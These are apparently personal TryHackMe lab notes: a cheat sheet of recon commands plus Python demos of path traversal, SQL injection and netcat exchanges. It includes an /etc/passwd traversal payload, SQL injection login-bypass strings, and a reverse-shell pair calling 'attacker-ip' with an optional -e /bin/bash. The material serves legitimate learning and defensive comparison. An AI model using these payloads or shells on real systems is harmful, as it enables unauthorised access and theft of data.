TryHackMe Pentest Notes
Commands and quick notes from TryHackMe pentest labs
Enumeration
Nmap Full TCP Port Scan (Stealth)
Scan all 65535 TCP ports using a SYN ("half-open") scan; -sS needs root because it uses raw sockets.
-sS SYN scan; -Pn skip host discovery (treat the host as up); -T4 faster timing; -p- all ports.
nmap -sS -Pn -T4 -p- target-ip
Nmap Service and Version Detection
Detect services and versions, and run the default NSE scripts against the ports the full scan found open.
-sV service/version detection; -sC default scripts; -T4 faster timing; -p comma-separated port list (substitute the open ports from the full scan).
nmap -sV -sC -T4 -p 22,80,443 target-ip
Curl Basic Web Request
Fetch headers or verbose output from a web server.
-I headers only; -v verbose output; -k allows insecure HTTPS.
curl -I target-ip
curl -v target-ip
Gobuster Directory Bruteforce
Bruteforce directories and files on a web server.
-u target URL; -w wordlist path; -x file extensions.
gobuster dir -u http://target-ip/ \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
-x php,html,txt
Nikto Web Vulnerability Scanner
Scan a web server for common misconfigurations and known issues.
-h sets the target host.
nikto -h target-ip
Netcat Banner Grab
Connect to a service and capture its banner.
-n no DNS; -v verbose output.
nc -nv target-ip port
Dig DNS Lookup
Query DNS records for a domain. Record types: a, aaaa, mx, txt, cname, ns, soa.
dig <type> website.com
dig mx website.com
Registrar Lookup
Check domain registration and ownership information.
whois website.com
Download Files
Download a file from a URL.
wget url
Web
Common Paths
Check common web paths that may expose files or metadata.
/assets, /robots.txt
File Inclusion / Path Traversal
Test for local file inclusion or traversal via a vulnerable parameter.
http://target-ip/?page=../../../../etc/passwd
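The traversal payload above has four ../ sequences because it assumes a web root four directories deep. As an added example (not from the original notes), the following Python shows how a vulnerable include resolves that parameter, how a hardened one refuses it, a generator for payloads of increasing depth, and the response check a tester applies. The web root path /var/www/html/pages and the sample responses are constructed for this example.

```python
import posixpath

# Constructed sample: the directory the (hypothetical) vulnerable app
# includes pages from. Chosen for this example only.
WEB_ROOT = "/var/www/html/pages"


def traversal_payloads(target_file="etc/passwd", max_depth=8):
    """Values for the `page` parameter with 1..max_depth '../' sequences.

    The depth of the web root is unknown from outside, so a tester walks
    up one level at a time until the response changes.
    """
    return ["../" * depth + target_file for depth in range(1, max_depth + 1)]


def resolve_vulnerable(page):
    """How an unsafe include typically resolves `page`: join to WEB_ROOT and
    normalise. Every '../' walks one directory up, out of the web root."""
    return posixpath.normpath(posixpath.join(WEB_ROOT, page))


def resolve_hardened(page):
    """Safe variant: reject absolute paths, normalise, and only accept a
    result that still lies inside WEB_ROOT. Returns None for anything else."""
    if page.startswith("/"):
        return None
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, page))
    if candidate != WEB_ROOT and not candidate.startswith(WEB_ROOT + "/"):
        return None
    return candidate


def looks_like_passwd(body):
    """Check a response body for the tell-tale root entry of /etc/passwd."""
    return "root:x:0:0:" in body


def first_working_depth(resolver, max_depth=8):
    """Depth at which the resolver first yields /etc/passwd, or None.

    Stands in for the loop a tester runs against the live parameter:
    try each payload in turn and stop at the first one that returns the file.
    """
    for depth, payload in enumerate(traversal_payloads(max_depth=max_depth), 1):
        if resolver(payload) == "/etc/passwd":
            return depth
    return None


if __name__ == "__main__":
    for payload in traversal_payloads(max_depth=5):
        print(f"{payload:28} -> vulnerable: {resolve_vulnerable(payload)}"
              f"  hardened: {resolve_hardened(payload)}")
    print("vulnerable app leaks at depth:", first_working_depth(resolve_vulnerable))
    print("hardened app leaks at depth:  ", first_working_depth(resolve_hardened))
```

Against a live target, replace the resolver with an HTTP request per payload and apply looks_like_passwd to each response body; a 200 response without the root entry usually means the depth is wrong, not that the parameter is safe.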
Windows AD
RDP to AD Host (Creds DOMAIN\username)
Connect to a domain-joined Windows host over RDP from a Windows client; log in as DOMAIN\username.
/v: sets the target host.
mstsc /v:target-ip
Linux
Give Executable Permissions
Make a script executable for the current user.
+x adds execute permission.
chmod +x script.sh
Run Program
Execute a local binary or script from the current directory.
./programname
Find .txt Files
Search the filesystem for text files.
-type f files only; -name pattern match; 2>/dev/null hides permission errors.
find / -type f -name "*.txt" 2>/dev/null
View Sudo Permissions
List commands the current user can run with sudo.
-l lists permitted commands.
sudo -l
See Files in Directories
List directory contents as root, e.g. when sudo -l shows ls is permitted.
sudo ls ../../../*
SQL Injection
Bypass Login (Always True)
Classic SQLi payload to make a WHERE clause always true.
' OR '1'='1
Login as Admin
Payload to close the string and comment out the rest of the query (in MySQL, -- must be followed by a space).
admin' --
Comment Out Rest of Query
Append a SQL comment to ignore the remainder of the query.
' OR '1'='1' --
MySQL Comment Variant
Alternate comment syntax for MySQL.
admin' #
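To see why these payloads work, here is an added example (not part of the original notes) in Python against an in-memory SQLite database: a string-concatenated login that the payloads above bypass, the same check with placeholders that they do not, and a probe helper that reports SQL errors, which is how the MySQL-only # variant shows up on SQLite. The users table and its two accounts are constructed for this example.

```python
import sqlite3


def make_db():
    """Constructed sample database for this example: one admin and one user."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "s3cret"), ("alice", "hunter2")])
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Classic injectable login: user input is concatenated into the SQL text,
    so quotes and comment markers in the input become part of the query."""
    query = ("SELECT username FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same check with placeholders: the driver passes input as data, so a
    quote in the username can never terminate the string literal."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def probe(conn, username_payload, password="anything"):
    """Try a username payload against the vulnerable login and classify the
    outcome: ("user", name) on success, ("user", None) on a clean failure,
    ("error", message) when the payload broke the SQL syntax, which is a
    strong sign the input is being parsed as SQL."""
    try:
        return ("user", login_vulnerable(conn, username_payload, password))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    conn = make_db()
    for payload in ["' OR '1'='1", "admin' --", "' OR '1'='1' --", "admin' #"]:
        print(f"{payload!r:22} vulnerable: {probe(conn, payload)}"
              f"  safe: {login_safe(conn, payload, 'anything')}")
```

The comment-based payloads succeed on SQLite because it honours -- like MySQL does; admin' # raises a syntax error here because # is a MySQL comment marker only, which is exactly why the cheat sheet lists it as a separate variant.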
Python
Install Package
Install a Python package with pip.
pip install pymodbus
Run Script
Run a Python script with Python 3.
python3 filename.py
ETC
Steganography Extract
Extract hidden data from a file.
-sf sets the stego file; -p supplies the passphrase (prompted for if omitted).
steghide extract -sf cover.jpg
TCPdump
Capture packets on a network interface.
-i selects the interface.
tcpdump -i any
Netcat Listener (Attacker)
Open a listening socket for a reverse shell.
-l listen mode; -v verbose; -n no DNS; -p local port.
nc -lvnp 4444
Netcat Connect (Victim)
Connect back from the victim to the attacker's listener (add -e /bin/bash on netcat builds that support it to spawn a shell).
nc attacker-ip 4444
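The listener/connect pair above, and the banner grab in the Enumeration section, are the two ends of one TCP exchange. As an added example (not from the original notes), this Python runs both roles on loopback: serve_once plays nc -lvnp, banner_grab plays nc -nv target-ip port, and exchange wires them together and returns what each side saw. The banner and payload strings are constructed samples, and the OS picks a free port.

```python
import socket
import threading


def serve_once(srv, banner, received):
    """Listener side, the `nc -lvnp PORT` role: accept one connection on an
    already-bound socket, greet with a banner, record the first thing the
    peer sends, then close."""
    with srv:
        conn, _ = srv.accept()
        with conn:
            conn.sendall(banner)
            conn.settimeout(2)
            try:
                received.append(conn.recv(4096))
            except socket.timeout:
                received.append(b"")


def banner_grab(host, port, payload=b"", timeout=2.0):
    """Client side, the `nc -nv HOST PORT` role: connect, optionally send
    something (e.g. a protocol greeting), and return the first bytes the
    service replies with. Empty bytes mean it said nothing within timeout."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        if payload:
            s.sendall(payload)
        try:
            return s.recv(4096)
        except socket.timeout:
            return b""


def exchange(banner=b"SSH-2.0-OpenSSH_9.6\r\n", payload=b"id\n"):
    """Run listener and client on loopback and return
    (bytes the client saw, bytes the listener received).
    Default banner/payload are constructed samples."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))      # port 0: let the OS pick a free port
    srv.listen(1)
    port = srv.getsockname()[1]
    received = []
    t = threading.Thread(target=serve_once, args=(srv, banner, received))
    t.start()
    seen = banner_grab("127.0.0.1", port, payload)
    t.join(timeout=5)
    return seen, (received[0] if received else b"")


if __name__ == "__main__":
    seen, got = exchange()
    print("client saw banner:", seen)
    print("listener received:", got)
```

Many services (SSH, SMTP, FTP) talk first, so banner_grab with an empty payload is enough; HTTP does not, which is why the curl entries above send a request before anything comes back.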
